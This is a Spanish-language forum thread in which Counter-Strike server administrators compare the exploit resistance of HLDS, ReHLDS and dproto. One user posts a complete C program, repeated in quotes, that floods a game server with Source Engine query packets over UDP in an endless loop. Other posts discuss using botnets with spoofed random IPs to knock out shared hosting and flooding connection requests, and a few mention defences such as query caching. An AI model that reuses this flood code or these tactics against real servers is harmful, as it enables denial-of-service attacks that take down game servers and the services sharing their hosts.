08/11/2019, 10:13 PM (Última modificación: 08/11/2019, 10:14 PM por Cr3470r. Edited 1 time in total.)
(08/11/2019, 04:29 AM)RauliTop escribió: Por otra parte, dproto no tiene protección contra un tipo de fakeplayers y se debe usar un plugin.
El xFakePlayers de ZeaL?, la variante va PERFECTA en el ReHLDS!, qué decís?
Te puedo adjuntar inclusive yo mismo un code en donde te entren un flood a tu server con ReHLDS y vas a ver que estás en la misma.
(08/11/2019, 04:29 AM)RauliTop escribió: Exactamente, yo haré lo que me dé la gana. Pero tampoco creo que te mueras por dar una opinión.
] kill
Rainnegan dead
(08/11/2019, 04:29 AM)RauliTop escribió: Ya lo hice, y el HLDS sin dproto se come muchos exploits, ReHLDS ninguno.
Se me olvidaba. Dproto ya no funciona con la última versión de HLDS, y aún esta última versión no corrige todos los exploits que sí corrige el dproto.
Suerte a quien use HLDS actualizado.
5 mins y uala!
Como te dije antes, hacé lo que se te cante las pelotas, si querés usar ReHLDS, agarrá y usalo, nadie te dice que no lo haga, cierro discusión acá ya que expusimos diferentes puntos de vista por lo cual, el que hizo el TH que haga lo que se le cante las pelotas tb.
(08/11/2019, 07:55 PM)Sugisaki escribió: un while estaria mejor
JAJAJAJAJAJAJAJAJ
EDIT: Había leido mal, miopía de mierda.
(15/12/2020, 07:06 PM)Mario AR. escribió: Cuando tu acatante conozca de tu nuevo puerto, te volverá a atacar
08/11/2019, 10:18 PM (Última modificación: 08/11/2019, 10:19 PM por Sugisaki. Edited 1 time in total.)
Código PHP:
#include <stdio.h> #include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
int main() { WSADATA wsdata; DWORD DllVersion = MAKEWORD(1, 2); CHAR szBytes[] = "\xFF\xFF\xFF\xFF\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65\x20\x51\x75\x65\x72\x79\x00"; CHAR szIP[] = "127.0.0.1"; unsigned short Port = 27015; if (WSAStartup(DllVersion, &wsdata) != 0) { printf("Fallo al crear el socket #1"); ExitProcess(EXIT_FAILURE); } SOCKET sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(!sock) { printf("Fallo al crear el socket #2"); ExitProcess(EXIT_FAILURE); } SOCKADDR_IN RecvAddr; RecvAddr.sin_family = AF_INET; RecvAddr.sin_port = htons(Port); RecvAddr.sin_addr.s_addr = inet_addr(szIP); while (sendto(sock, szBytes, 25, 0, (const struct sockaddr *)&RecvAddr, sizeof(RecvAddr))) { continue; } ExitProcess(EXIT_SUCCESS); }
me cuesta un poco probarlo, pero cuando te hacen un spoof, el proceso hlds llega hasta un 100%, no solo ese tambien un procesador de cola ksoirqnoseque de linux
(14/08/2015, 10:15 PM)Sugisaki escribió: "El mundo es caotico, irracional e injusto. No tiene ningun significado"
Palabras que desde hace mucho tiempo he buscado para describir, ¿Que es el mundo?
int main() { WSADATA wsdata; DWORD DllVersion = MAKEWORD(1, 2); CHAR szBytes[] = "\xFF\xFF\xFF\xFF\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65\x20\x51\x75\x65\x72\x79\x00"; CHAR szIP[] = "127.0.0.1"; unsigned short Port = 27015; if (WSAStartup(DllVersion, &wsdata) != 0) { printf("Fallo al crear el socket #1"); ExitProcess(EXIT_FAILURE); } SOCKET sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(!sock) { printf("Fallo al crear el socket #2"); ExitProcess(EXIT_FAILURE); } SOCKADDR_IN RecvAddr; RecvAddr.sin_family = AF_INET; RecvAddr.sin_port = htons(Port); RecvAddr.sin_addr.s_addr = inet_addr(szIP); while (sendto(sock, szBytes, 25, 0, (const struct sockaddr *)&RecvAddr, sizeof(RecvAddr))) { continue; } ExitProcess(EXIT_SUCCESS); }
me cuesta un poco probarlo, pero cuando te hacen un spoof, el proceso hlds llega hasta un 100%, no solo ese tambien un procesador de cola ksoirqnoseque de linux
Dejalo que siga usando ReHLDS ...
(15/12/2020, 07:06 PM)Mario AR. escribió: Cuando tu acatante conozca de tu nuevo puerto, te volverá a atacar
08/11/2019, 11:44 PM (Última modificación: 08/11/2019, 11:47 PM por Nube.. Edited 2 times in total.)
me hace gracia que estén mostrando un exploit del pasado en un foro donde fixean la misma jaja (bueno igual ese """exploit""" esta mas fixeado que el sedly )
(08/11/2019, 11:44 PM)Nube. escribió: me hace gracia que estén mostrando un exploit del pasado en un foro donde fixean la misma jaja (bueno igual ese """exploit""" esta mas fixeado que el sedly )
podra ser un exploit del pasado pero es el mas poderoso que existe para ese juego,
solo imagina que con una simple botnet (y lo mencione) usando un random ip (desconozco como lo hacen) tumban el servidor entero, no un sv, todos los servidores de juegos que esten compartiendo recursos con el afectado
(14/08/2015, 10:15 PM)Sugisaki escribió: "El mundo es caotico, irracional e injusto. No tiene ningun significado"
Palabras que desde hace mucho tiempo he buscado para describir, ¿Que es el mundo?
09/11/2019, 01:23 AM (Última modificación: 09/11/2019, 01:24 AM por Cr3470r. Edited 1 time in total.)
(09/11/2019, 01:08 AM)Sugisaki escribió: podra ser un exploit del pasado pero es el mas poderoso que existe para ese juego,
En cuanto atacar servers, si, floodear las querys es lo básico.
Para evitar esto yo haría que si me floodean las querys desde 10 ips diferentes (más o menos), se desactiven por "x" tiempo y listo.
Igual tampoco serviría, me podrías floodear el connect o el getchallenge, y si te desactivo eso, me vacias el server ya que nadie podría conectarse.
En cuanto atacar clientes, hasta ahora el NDF (lo expliqué el otro día) y la ejecución de ejecutables en demos son los únicos más potentes (No-Steam), en Steam no recuerdo que cosas tengo...
PD: La reroducción de archivos .mp4 sigue igual o la fixearon?
(09/11/2019, 01:08 AM)Sugisaki escribió: solo imagina que con una simple botnet (y lo mencione) usando un random ip (desconozco como lo hacen) tumban el servidor entero, no un sv, todos los servidores de juegos que esten compartiendo recursos con el afectado
Che pero si el server tiene buena conexión no le harías nada.
Lo del random ip por lo general te lo ofrecen los servicios de la botnet que estés usando.
(15/12/2020, 07:06 PM)Mario AR. escribió: Cuando tu acatante conozca de tu nuevo puerto, te volverá a atacar
(09/11/2019, 01:08 AM)Sugisaki escribió: podra ser un exploit del pasado pero es el mas poderoso que existe para ese juego,
PD: La reProducción de archivos .mp4 sigue igual o la fixearon?
Nop
@metita de paso podrías hacer otro TH en el github para que no excedan los 1000 fps ?, ya da muchísimo asco ver como players vuelan por todos lados por tener Auto-Strafes y más de 1000 fps.
(15/12/2020, 07:06 PM)Mario AR. escribió: Cuando tu acatante conozca de tu nuevo puerto, te volverá a atacar
09/11/2019, 07:12 PM (Última modificación: 09/11/2019, 07:13 PM por RauliTop.)
(08/11/2019, 10:13 PM)Cr3470r escribió: El xFakePlayers de ZeaL?, la variante va PERFECTA en el ReHLDS!, qué decís?
Te puedo adjuntar inclusive yo mismo un code en donde te entren un flood a tu server con ReHLDS y vas a ver que estás en la misma.
5 mins y uala!
El xfakeplayer lo bloquea el reauthchecker. Si pones rehlds, debes ponerlo, lógicamente.
A cual flood te refieres? Hay otro flood de micro que se protege con el VTC o revoice.
Que quieres decir con esa captura? Hiciste correr dproto en la última versión de HLDS? Vi muchos que se quejaban que les daba error por la versión, pero nunca lo probé
(08/11/2019, 10:18 PM)Sugisaki escribió:
Código PHP:
#include <stdio.h> #include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
int main() { WSADATA wsdata; DWORD DllVersion = MAKEWORD(1, 2); CHAR szBytes[] = "\xFF\xFF\xFF\xFF\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65\x20\x51\x75\x65\x72\x79\x00"; CHAR szIP[] = "127.0.0.1"; unsigned short Port = 27015; if (WSAStartup(DllVersion, &wsdata) != 0) { printf("Fallo al crear el socket #1"); ExitProcess(EXIT_FAILURE); } SOCKET sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(!sock) { printf("Fallo al crear el socket #2"); ExitProcess(EXIT_FAILURE); } SOCKADDR_IN RecvAddr; RecvAddr.sin_family = AF_INET; RecvAddr.sin_port = htons(Port); RecvAddr.sin_addr.s_addr = inet_addr(szIP); while (sendto(sock, szBytes, 25, 0, (const struct sockaddr *)&RecvAddr, sizeof(RecvAddr))) { continue; } ExitProcess(EXIT_SUCCESS); }
me cuesta un poco probarlo, pero cuando te hacen un spoof, el proceso hlds llega hasta un 100%, no solo ese tambien un procesador de cola ksoirqnoseque de linux
Por el reunion? O también pasa en el HLDS con dproto?
(17/04/2015, 03:36 PM)Neeeeeeeeeel.- escribió: No se va a volver a conectar a internet en toda su puta vida... nadie sube porno a mi foro y vive para contarlo.
10/11/2019, 10:16 AM (Última modificación: 10/11/2019, 10:17 AM por Sugisaki.)
(09/11/2019, 01:23 AM)Cr3470r escribió: Che pero si el server tiene buena conexión no le harías nada.
Lo del random ip por lo general te lo ofrecen los servicios de la botnet que estés usando.
Tienes que ver el que me hiceron hace poco, pcap lo borre, mano por ese simple random ip al query el proceso del hlds se explotaba al 100% de cpu, de todas formas hice un desvio de paquetes a otro lugar donde hace query (cache) si atacan el query, se laggeara aquel lugar remoto
(09/11/2019, 07:12 PM)RauliTop escribió: Por el reunion? O también pasa en el HLDS con dproto?
(14/08/2015, 10:15 PM)Sugisaki escribió: "El mundo es caotico, irracional e injusto. No tiene ningun significado"
Palabras que desde hace mucho tiempo he buscado para describir, ¿Que es el mundo?
(17/04/2015, 03:36 PM)Neeeeeeeeeel.- escribió: No se va a volver a conectar a internet en toda su puta vida... nadie sube porno a mi foro y vive para contarlo.
(10/11/2019, 10:49 PM)Niper.-. escribió: Como que no? Sí te banea en teoría no tendria que recibir nada el servidor, ya que te bloquea la ip. En DProto pasa eso por ejemplo. en Reunion no?
(10/11/2019, 10:49 PM)Niper.-. escribió: Como que no? Sí te banea en teoría no tendria que recibir nada el servidor, ya que te bloquea la ip. En DProto pasa eso por ejemplo. en Reunion no?
imagina ahora enviar cientos de ips distintas haciendo query al mismo tiempo! en el tiempo que el sv procesa si un query es valido o no ya han entrado 5 ips mas atrás aumentando el consumo del procesador! lo que lleva al query cache como una opción mas viable!